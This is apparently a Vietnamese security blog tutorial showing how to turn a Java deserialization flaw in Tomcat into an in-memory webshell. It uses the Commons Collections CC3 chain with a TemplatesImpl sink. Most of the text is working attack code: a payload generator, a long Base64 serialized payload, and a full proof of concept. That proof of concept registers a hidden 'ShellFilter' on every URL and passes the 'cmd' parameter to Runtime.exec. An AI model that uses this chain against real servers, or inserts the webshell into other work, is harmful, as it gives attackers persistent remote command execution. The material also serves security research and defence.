Deserialize to memshell in Tomcat
Sau khi hiểu cơ bản cách triển khai memshell thông qua JSP, ta tiếp tục tìm hiểu đến kỹ thuật leo memshell thông qua lỗ hổng deserialize.
1. Preface
Hiện tại theo như mình tìm hiểu thì ta chỉ có thể leo lên memshell thông qua deser của một số chain dùng sink TemplatesImpl như CommonsBeanutils1, CC2, CC3, CC4 vì TemplatesImpl cho phép ta load được byte code của class bất kỳ vào quá trình Runtime -> Dễ triển khai memshell hơn, do đó trong phần này mình chỉ note về deser2memshell với sink TemplatesImpl. Do đó để hiểu rõ hơn mình khuyên các bạn nên nắm rõ cách sink TemplatesImpl hoạt động với một số chain như CommonsBeanutils1 hoặc CC3 (Tham khảo chi tiết bài này)
Môi trường lab trong bài này sẽ là jdk8u66 với commons-collections 3.2.1, ta sẽ demo leo memshell với chain CC3
2. Setup labs
Ta sẽ có một trang web servlet đơn giản để demo như sau
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.util.Base64;
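/**
 * Deliberately vulnerable lab servlet: it Base64-decodes the {@code data} request
 * parameter and feeds the bytes to {@link ObjectInputStream#readObject()}.
 *
 * <p>SECURITY: the deserialized bytes are fully client-controlled and no class
 * filtering is applied, so any serializable gadget on the classpath can be
 * instantiated. This is kept on purpose for the lab. Outside a lab, do not
 * deserialize untrusted input with native Java serialization; use a data-only
 * format, or restrict the accepted classes with a look-ahead allowlist (an
 * {@code ObjectInputStream} subclass overriding {@code resolveClass}, or
 * {@code java.io.ObjectInputFilter} on JDK 9+).
 */
@WebServlet("/")
public class DeserLab extends HttpServlet {
    /**
     * Decodes and deserializes the {@code data} parameter, printing the resulting object.
     *
     * @param req  request carrying the Base64-encoded serialized object in {@code data}
     * @param resp response; receives 400 when {@code data} is missing or not valid Base64
     * @throws IOException if the stream header is corrupt or reading fails
     */
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String encoded = req.getParameter("data");
        if (encoded == null) {
            // Previously this fell through to Base64.decode(null) and surfaced as a NullPointerException.
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "missing 'data' parameter");
            return;
        }

        byte[] data;
        try {
            data = Base64.getDecoder().decode(encoded);
        } catch (IllegalArgumentException e) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "'data' is not valid Base64");
            return;
        }

        // try-with-resources so the stream is closed even when readObject() throws.
        try (ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(data))) {
            // SECURITY: unfiltered readObject() on untrusted bytes -- the vulnerability this lab demonstrates.
            System.out.println(objectInputStream.readObject());
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
    }

    /** Handles GET exactly like POST, so the payload can also arrive in the query string. */
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doPost(req, resp);
    }
}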
Mình dùng chain CC3 như sau để exploit
import java.io.*;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
import javassist.ClassPool;
import org.apache.commons.collections.map.LazyMap;
import java.util.Base64;
/**
 * Lab helper that builds the serialized object graph used against the DeserLab
 * servlet and prints it as Base64.
 *
 * <p>Defender note: every class referenced in {@code main} is written by name into
 * the serialized stream (AnnotationInvocationHandler, LazyMap, ChainedTransformer,
 * ConstantTransformer, InstantiateTransformer, TrAXFilter, TemplatesImpl). A
 * deserialization class filter on the receiving side that rejects these names stops
 * the stream before any of them is instantiated. The article pins the lab to
 * jdk8u66 with commons-collections 3.2.1.
 */
public class CC3 {
/** Serializes {@code obj} with Java native serialization and returns the bytes Base64-encoded. */
private static String serTest(Object obj) throws Exception {
ByteArrayOutputStream bArr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bArr);
oos.writeObject(obj);
oos.close();
byte[] bytes = bArr.toByteArray();
return Base64.getEncoder().encodeToString(bytes);
}
/** Local round-trip check: Base64-decodes {@code input} and calls readObject() on it, as the servlet does. */
private static void deserTest(String input) throws Exception {
byte[] bArr = Base64.getDecoder().decode(input);
InputStream is = new ByteArrayInputStream(bArr);
ObjectInputStream ois = new ObjectInputStream(is);
ois.readObject();
ois.close();
}
/**
 * Sets a field on {@code obj} by reflection, bypassing access checks.
 * Only fields declared directly on {@code obj}'s runtime class are found (getDeclaredField).
 */
private static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
/** Assembles the object graph and prints its Base64 serialization to stdout. */
public static void main(String[] args) throws Exception {
// Reads the compiled bytecode of the class to embed via javassist.
// "<Class_Wanna_Load>" is the article's placeholder, not valid Java.
byte[] bArr = ClassPool.getDefault().get(<Class_Wanna_Load>.class.getName()).toBytecode();
// TemplatesImpl is the sink: per the article it loads the embedded bytecode at runtime.
// Its private fields are filled in by reflection.
TemplatesImpl tplsImpl = new TemplatesImpl();
setFieldValue(tplsImpl, "_bytecodes", new byte[][]{bArr});
setFieldValue(tplsImpl, "_name", "ahihi");
setFieldValue(tplsImpl, "_tfactory", new TransformerFactoryImpl());
// Transformer chain: produce TrAXFilter.class, then construct it with the Templates argument.
ConstantTransformer constTransformer = new ConstantTransformer(TrAXFilter.class);
InstantiateTransformer insTransformer = new InstantiateTransformer(new Class[]{javax.xml.transform.Templates.class},
new Object[]{tplsImpl});
ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{
constTransformer, insTransformer
});
Map map = new HashMap();
// LazyMap invokes the transformer chain as its factory on a key lookup.
Map lazyMap = LazyMap.decorate(map, chainedTransformer); // factory#transform()
// AnnotationInvocationHandler has no public constructor, so it is obtained reflectively.
Class aInvocationHandlerCls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor aInvocationHandlerConstructor = aInvocationHandlerCls.getDeclaredConstructors()[0];
aInvocationHandlerConstructor.setAccessible(true);
InvocationHandler proxyHandler = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, lazyMap);
// Dynamic proxy over Map whose calls are routed to the handler that wraps the LazyMap.
Map proxyMap = (Map) Proxy.newProxyInstance(
map.getClass().getClassLoader(),
map.getClass().getInterfaces(),
proxyHandler
);
// Outer handler wrapping the proxy; this is the object that gets serialized.
InvocationHandler aihObj = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, proxyMap);
String serialized = serTest(aihObj);
// Defender note: the article's printed output starts with "rO0AB", the Base64 form of the
// Java serialization stream header -- a usable signature for request inspection.
System.out.println(serialized);
// deserTest(serialized);
}
}
3. Phân tích
A. Vấn đề
Nhìn lại các payload load memshell bằng JSP ta sẽ nhận ra để setup malicious Filter/Servlet/Listener ta đều cần dùng đến object request
có sẵn trong file jsp. Object này là instance của HttpServletRequest
. Đối với file JSP thì ta có thể gọi đến object này dễ dàng. Tuy nhiên khi deser lại là một chuyện hoàn toàn khác.
Vấn đề lớn nhất khi muốn leo từ deser là ta không thể gọi trực tiếp đến HttpServletRequest
. Do mỗi HttpServletRequest
sẽ đại diện cho mỗi request đến từ client nên ta không thể khai báo trực tiếp khi deser được mà phải tìm cách dump từ Runtime.
Để giải quyết các vấn đề trên ta có nhiều phương pháp khác nhau. Tuy nhiên ở bài này mình sẽ tập trung vào phương pháp của @kingkk (bài gốc)
Ngoài ra cũng còn nhiều phương pháp khác mà các bạn có thể tự tham khảo để triển khai. Ví dụ như:
B. Phân tích và khai thác
Note: Để set debug cũng như gen payload exploit cho đơn giản thì ta có thể embed tomcat core vào project (version phải cùng với version tomcat đang sử dụng - mình đang dùng tomcat 9.0.91 nên sẽ embed version 9.0.91 luôn)
Ý tưởng của phương pháp này là sẽ tìm cách get được HttpServletRequest
thông qua một property nào đó trong quá trình Runtime gọi đến các components của Tomcat.
Inject ThreadLocal
Như đã biết từ bài trước thì trong quá trình Tomcat handle các Filter thì sẽ gọi đến ApplicationContext.internalDoFilter
để thực thi Filter
Sau khi thực hiện doFilter
xong thì hàm này còn tiếp tục set giá trị request và response vào lastServicedRequest
và lastServicedResponse
nếu như ApplicationDispatcher.WRAP_SAME_OBJECT
là true
Vậy thì property này là gì? Xem vào phần define property ở đầu class ta có được:
2 property này sẽ là 2 ThreadLocal (khái niệm ThreadLocal) hold request và response khi gọi đến Filter. Tuy nhiên giá trị ApplicationDispatcher.WRAP_SAME_OBJECT
mặc định sẽ là false, do đó lastServicedRequest
và lastServicedResponse
sẽ được set là null.
Trong quá trình Runtime request và response sẽ được gán vào 2 property này nếu như ApplicationDispatcher.WRAP_SAME_OBJECT
là true. Lợi dụng hành vi này ta sẽ setup ApplicationDispatcher.WRAP_SAME_OBJECT
thành true để Tomcat tự động set request và response vào lastServicedRequest
và lastServicedResponse
. Sau đó ta gán một filter độc hại bằng cách gọi đến lastServicedRequest
trong quá trình deserialize
Vì đây là 2 property static final nên ta sẽ dùng Reflection theo cách này để setup giá trị
// Looks up the three static fields Tomcat uses to remember the last serviced request/response.
java.lang.reflect.Field WRAP_SAME_OBJECT_FIELD = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
java.lang.reflect.Field lastServicedResponseField = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");
// Clears the FINAL bit on each Field object by writing to Field's private "modifiers" field.
// NOTE(review): newer JDKs (12+) hide Field.modifiers from reflection, so this step is
// JDK-version dependent; the article's lab runs jdk8u66 -- confirm against the runtime in use.
java.lang.reflect.Field modifiersField = Field.class.getDeclaredField("modifiers");
modifiersField.setAccessible(true);
modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() & ~Modifier.FINAL);
modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() & ~Modifier.FINAL);
// Makes the (non-public) fields readable and writable from this code.
WRAP_SAME_OBJECT_FIELD.setAccessible(true);
lastServicedRequestField.setAccessible(true);
lastServicedResponseField.setAccessible(true)
Khi thay đổi giá trị thành công ta có thể gọi đến ServletContext như sau
// Reads the static ThreadLocal that holds the current thread's last serviced request.
java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
ThreadLocal threadLocal = (ThreadLocal) lastServicedRequestField.get(null);
// threadLocal.get() is only non-null once Tomcat has stored a request there
// (per the article, that happens when WRAP_SAME_OBJECT is true).
ServletRequest servletRequest = (ServletRequest) threadLocal.get();
servletRequest.getServletContext();
Từ ServletContext ta có thể gọi đến StandardContext (tham khảo bài trước). Và từ StandardContext có thể tự do setup memshell theo mong muốn.
Full POC dùng với chain CC3
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.core.ApplicationFilterChain;
import javax.servlet.ServletResponse;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
/**
 * Stage-one class from the article: its static initializer switches Tomcat's
 * WRAP_SAME_OBJECT flag on and makes sure the lastServicedRequest /
 * lastServicedResponse ThreadLocals exist. It extends AbstractTranslet so that it
 * can be carried in TemplatesImpl's bytecode array.
 *
 * <p>Defender note: the article states WRAP_SAME_OBJECT is false by default, so a
 * running Tomcat where it reads true (and where both ThreadLocals are non-null)
 * without matching configuration is an integrity indicator worth checking.
 */
public class ThreadLocalInject extends AbstractTranslet {
// All work happens in the static initializer, i.e. as soon as the class is initialized.
static {
try {
java.lang.reflect.Field WRAP_SAME_OBJECT_FIELD = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
java.lang.reflect.Field lastServicedResponseField = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");
// Strips FINAL from the three fields through Field's private "modifiers" field.
// NOTE(review): JDK-version dependent (newer JDKs hide Field.modifiers) -- confirm.
java.lang.reflect.Field modifiersField = Field.class.getDeclaredField("modifiers");
modifiersField.setAccessible(true);
modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() & ~Modifier.FINAL);
modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() & ~Modifier.FINAL);
WRAP_SAME_OBJECT_FIELD.setAccessible(true);
lastServicedRequestField.setAccessible(true);
lastServicedResponseField.setAccessible(true);
// Flips the flag only when it is currently false.
if (!WRAP_SAME_OBJECT_FIELD.getBoolean(null)) {
WRAP_SAME_OBJECT_FIELD.setBoolean(null, true);
}
// Installs fresh ThreadLocals where Tomcat left the fields null.
if (lastServicedRequestField.get(null) == null) {
lastServicedRequestField.set(null, new ThreadLocal<>());
}
if (lastServicedResponseField.get(null) == null) {
lastServicedResponseField.set(null, new ThreadLocal<>());
}
// Writes a marker string into the current response, if one is stored for this thread.
// NOTE(review): when the ThreadLocal was created just above, get() presumably returns null
// and the getWriter() call fails; the catch below then prints a stack trace, which would
// be a visible log artefact of this stage.
if (lastServicedResponseField.get(null) != null) {
ThreadLocal threadLocal = (ThreadLocal) lastServicedResponseField.get(null);
ServletResponse servletResponse = (ServletResponse) threadLocal.get();
PrintWriter writer = servletResponse.getWriter();
writer.write("Inject ThreadLocal Successfully!");
writer.flush();
writer.close();
}
} catch (Exception e) {
// Any failure is only printed; class initialization still completes.
e.printStackTrace();
}
}
// Empty overrides required because AbstractTranslet declares these methods abstract.
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
Gen payload với CC3
/**
 * Same graph construction as the CC3 listing earlier in the article, with
 * ThreadLocalInject as the embedded class. Prints the Base64 serialization.
 * Relies on the serTest/setFieldValue helpers from that listing.
 */
public static void main(String[] args) throws Exception {
// Bytecode of the stage-one class, read through javassist.
byte[] bArr = ClassPool.getDefault().get(ThreadLocalInject.class.getName()).toBytecode();
// TemplatesImpl private fields populated by reflection; _bytecodes carries the class.
TemplatesImpl tplsImpl = new TemplatesImpl();
setFieldValue(tplsImpl, "_bytecodes", new byte[][]{bArr});
setFieldValue(tplsImpl, "_name", "ahihi");
setFieldValue(tplsImpl, "_tfactory", new TransformerFactoryImpl());
// Transformer chain: produce TrAXFilter.class, then construct it with the Templates argument.
ConstantTransformer constTransformer = new ConstantTransformer(TrAXFilter.class);
InstantiateTransformer insTransformer = new InstantiateTransformer(new Class[]{javax.xml.transform.Templates.class},
new Object[]{tplsImpl});
ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{
constTransformer, insTransformer
});
Map map = new HashMap();
// LazyMap invokes the transformer chain as its factory on a key lookup.
Map lazyMap = LazyMap.decorate(map, chainedTransformer); // factory#transform()
// AnnotationInvocationHandler is obtained reflectively (no public constructor).
Class aInvocationHandlerCls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor aInvocationHandlerConstructor = aInvocationHandlerCls.getDeclaredConstructors()[0];
aInvocationHandlerConstructor.setAccessible(true);
InvocationHandler proxyHandler = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, lazyMap);
Map proxyMap = (Map) Proxy.newProxyInstance(
map.getClass().getClassLoader(),
map.getClass().getInterfaces(),
proxyHandler
);
// Outer handler wrapping the proxy; this is the serialized root object.
InvocationHandler aihObj = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, proxyMap);
String serialized = serTest(aihObj);
System.out.println(serialized);
// deserTest(serialized);
}
Kết quả:
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%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAC%2BDK%2Frq%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%2BDAB%2FAIAMAIEAIQwAggAhAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAgwAhAQARVGhyZWFkTG9jYWxJbmplY3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAPamF2YS9sYW5nL0NsYXNzAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAxnZXRNb2RpZmllcnMBAAMoKUkBAAZzZXRJbnQBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAKZ2V0Qm9vbGVhbgEAFShMamF2YS9sYW5nL09iamVjdDspWgEACnNldEJvb2xlYW4BABYoTGphdmEvbGFuZy9PYmplY3Q7WilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUH
JpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gBAAVjbG9zZQEAD3ByaW50U3RhY2tUcmFjZQAhAB4AHwAAAAAABAABACAAIQABACIAAAAvAAEAAQAAAAUqtwABsQAAAAIAIwAAAAYAAQAAAA0AJAAAAAwAAQAAAAUAJQAmAAAAAQAnACgAAgAiAAAAPwAAAAMAAAABsQAAAAIAIwAAAAYAAQAAAD0AJAAAACAAAwAAAAEAJQAmAAAAAAABACkAKgABAAAAAQArACwAAgAtAAAABAABAC4AAQAnAC8AAgAiAAAASQAAAAQAAAABsQAAAAIAIwAAAAYAAQAAAEIAJAAAACoABAAAAAEAJQAmAAAAAAABACkAKgABAAAAAQAwADEAAgAAAAEAMgAzAAMALQAAAAQAAQAuAAgANAAhAAEAIgAAAd0ABAAHAAAA0BICuAADEgS2AAVLEgYSB7YABUwSBhIItgAFTRIJEgq2AAVOLQS2AAstKiq2AAwQ7362AA4tKyu2AAwQ7362AA4tLCy2AAwQ7362AA4qBLYACysEtgALLAS2AAsqAbYAD5oACSoBBLYAECsBtgARxwAPKwG7ABJZtwATtgAULAG2ABHHAA8sAbsAElm3ABO2ABQsAbYAEcYAMSwBtgARwAASOgQZBLYAFcAAFjoFGQW5ABcBADoGGQYSGLYAGRkGtgAaGQa2ABunAAhLKrYAHbEAAQAAAMcAygAcAAMAIwAAAHIAHAAAABMACwAUABMAFQAbABcAIwAYACgAGQA0ABoAQAAbAEwAHABRAB0AVgAeAFsAIABjACEAaQAkAHEAJQB9ACgAhQApAJEALACZAC0AowAuAK0ALwC2ADAAvQAxAMIAMgDHADYAygA0AMsANQDPADcAJAAAAFIACACjACQANQA2AAQArQAaADcAOAAFALYAEQA5ADoABgALALwAOwA8AAAAEwC0AD0APAABABsArAA%2BADwAAgAjAKQAPwA8AAMAywAEAEAAQQAAAEIAAAAjAAb%2FAGkABAcAQwcAQwcAQwcAQwAAExP%2FADUAAAAAQgcARAQAAQBFAAAAAgBGcHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D
Trước khi inject:
Tiến hành inject:
Sau khi inject:
Inject Filter
Tiếp theo ta tiến hành inject malicious Filter. Ta sẽ dùng chain ServletContext để gọi đến StandardContext như sau (chain đã nói ở bài trước)
/**
 * Returns the ServletContext of the request stored in
 * ApplicationFilterChain.lastServicedRequest for the current thread.
 *
 * @return the context, or {@code null} when the ThreadLocal is absent or holds no request
 */
public static ServletContext getServletContext() throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
lastServicedRequestField.setAccessible(true);
// Static field, hence the null receiver.
ThreadLocal threadLocal = (ThreadLocal) lastServicedRequestField.get(null);
// Both the ThreadLocal and its per-thread value must be present before use.
if(threadLocal!=null && threadLocal.get()!=null){
ServletRequest servletRequest = (ServletRequest) threadLocal.get();
return servletRequest.getServletContext();
}
return null;
}
Khi có ServletContext thì ta cũng inject malicious Filter như cách đã làm với file JSP. Tuy nhiên có một lưu ý nhỏ là ta sẽ gộp chung malicious Filter và class setup Filter luôn. Tức là class exploit này tự setup chính nó vào Runtime như một malicious Filter.
Nguyên nhân của việc trên là nếu class setup một malicious Filter khác thì ta phải upload file class của malicious Filter lên server nếu không thì khi deser sẽ quăng ra lỗi ClassNotFound (các bạn debug sẽ dễ hiểu đoạn này hơn). Do đó ta sẽ gộp chung class inject và malicious filter vào chung 1 class.
Full POC kết hợp exploit với CC3
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationFilterChain;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import javax.servlet.*;
import java.lang.reflect.InvocationTargetException;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
/**
 * Stage-two class from the article: it is both the class that registers a filter on
 * the running StandardContext and the filter that gets registered.
 *
 * <p>Defender notes, all taken from this listing:
 * <ul>
 *   <li>the filter is registered at runtime under the name "ShellFilter", mapped to
 *       "/*" for the REQUEST dispatcher, and placed ahead of existing filter maps;</li>
 *   <li>it is added straight into StandardContext's private filterConfigs map, so it
 *       has no counterpart in web.xml or annotations -- comparing the live filter list
 *       against the deployed descriptors exposes it;</li>
 *   <li>per the article the class is delivered inside the serialized payload rather
 *       than uploaded, so the filter class presumably has no class file on disk;</li>
 *   <li>doFilter hands the {@code cmd} request parameter to Runtime.exec, so child
 *       processes spawned by the Tomcat JVM are a host-level signal.</li>
 * </ul>
 * Registration lives only in the running context's in-memory structures.
 */
public class TomcatFilterInject extends AbstractTranslet implements Filter {
// Registration runs in the static initializer, i.e. when the class is initialized.
static {
try {
// NOTE(review): getServletContext() can return null (see below); the next line would then
// throw a NullPointerException, which none of the catch clauses here handles.
ServletContext servletContext = getServletContext();
// Unwraps two private "context" fields: facade -> ApplicationContext -> StandardContext.
java.lang.reflect.Field appContextField = servletContext.getClass().getDeclaredField("context");
appContextField.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);
java.lang.reflect.Field standardContextField = applicationContext.getClass().getDeclaredField("context");
standardContextField.setAccessible(true);
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
// Filter definition pointing at an instance of this very class.
TomcatFilterInject filter = new TomcatFilterInject();
String name = "ShellFilter";
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filter);
filterDef.setFilterName(name);
filterDef.setFilterClass(filter.getClass().getName());
standardContext.addFilterDef(filterDef);
// Mapping: every URL, REQUEST dispatcher, inserted before the existing mappings.
FilterMap filterMap = new FilterMap();
filterMap.addURLPattern("/*");
filterMap.setFilterName(name);
filterMap.setDispatcher(DispatcherType.REQUEST.name());
standardContext.addFilterMapBefore(filterMap);
// Writes an ApplicationFilterConfig directly into the context's private filterConfigs map,
// using the non-public (Context, FilterDef) constructor.
java.lang.reflect.Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
Configs.setAccessible(true);
java.util.Map filterConfigs = (java.util.Map) Configs.get(standardContext);
java.lang.reflect.Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(org.apache.catalina.Context.class, FilterDef.class);
constructor.setAccessible(true);
ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
filterConfigs.put(name, filterConfig);
// Reflection failures are only printed to stderr; nothing is rethrown.
} catch (NoSuchFieldException e) {
e.printStackTrace();
} catch (ClassNotFoundException e) {
e.printStackTrace();
} catch (IllegalAccessException e) {
e.printStackTrace();
} catch (InvocationTargetException e) {
e.printStackTrace();
} catch (NoSuchMethodException e) {
e.printStackTrace();
} catch (InstantiationException e) {
e.printStackTrace();
}
}
/**
 * Returns the ServletContext of the request stored in
 * ApplicationFilterChain.lastServicedRequest for the current thread, or {@code null}
 * when the ThreadLocal is absent or empty.
 */
public static ServletContext getServletContext() throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
lastServicedRequestField.setAccessible(true);
ThreadLocal threadLocal = (ThreadLocal) lastServicedRequestField.get(null);
if(threadLocal!=null && threadLocal.get()!=null){
ServletRequest servletRequest = (ServletRequest) threadLocal.get();
return servletRequest.getServletContext();
}
return null;
}
// Empty overrides required because AbstractTranslet declares these methods abstract.
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
/**
 * Filter body. When the request carries a {@code cmd} parameter, its value is executed
 * with Runtime.exec and the process's stdout is written to the response; the request
 * is then passed down the chain in every case.
 */
@Override
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
// SECURITY: unauthenticated request parameter flows directly into process execution.
String cmd = request.getParameter("cmd");
response.setContentType("text/html; charset=UTF-8");
PrintWriter writer = response.getWriter();
if (cmd != null) {
try {
InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
// "\\A" delimiter makes the Scanner return the whole stream as one token.
java.util.Scanner scanner = new java.util.Scanner(in).useDelimiter("\\A");
String result = scanner.hasNext()?scanner.next():"";
scanner.close();
writer.write(result);
writer.flush();
writer.close();
} catch (IOException e) {
e.printStackTrace();
} catch (NullPointerException n) {
n.printStackTrace();
}
}
// Still forwards to the rest of the chain, even after the writer was closed above.
chain.doFilter(request, response);
}
}
Kết quả:
